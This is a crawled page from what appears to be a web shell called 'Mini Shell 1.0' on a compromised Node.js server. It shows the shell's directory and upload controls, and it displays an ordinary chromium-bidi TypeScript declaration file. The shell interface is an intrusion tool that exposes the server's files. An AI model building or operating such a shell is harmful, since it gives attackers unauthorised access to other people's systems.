HOME


Mini Shell 1.0
Redirecting to https://devs.lapieza.net/iniciar-sesion Redirecting to https://devs.lapieza.net/iniciar-sesion.
DIR: /var/www/node-app/node_modules/chromium-bidi/lib/cjs/bidiMapper/modules/input/
Upload File :
Current File : //var/www/node-app/node_modules/chromium-bidi/lib/cjs/bidiMapper/modules/input/InputProcessor.d.ts
import { Input, type EmptyResult } from '../../../protocol/protocol.js';
import type { BrowsingContextStorage } from '../context/BrowsingContextStorage.js';
export declare class InputProcessor {
    #private;
    constructor(browsingContextStorage: BrowsingContextStorage);
    performActions(params: Input.PerformActionsParameters): Promise<EmptyResult>;
    releaseActions(params: Input.ReleaseActionsParameters): Promise<EmptyResult>;
    setFiles(params: Input.SetFilesParameters): Promise<EmptyResult>;
}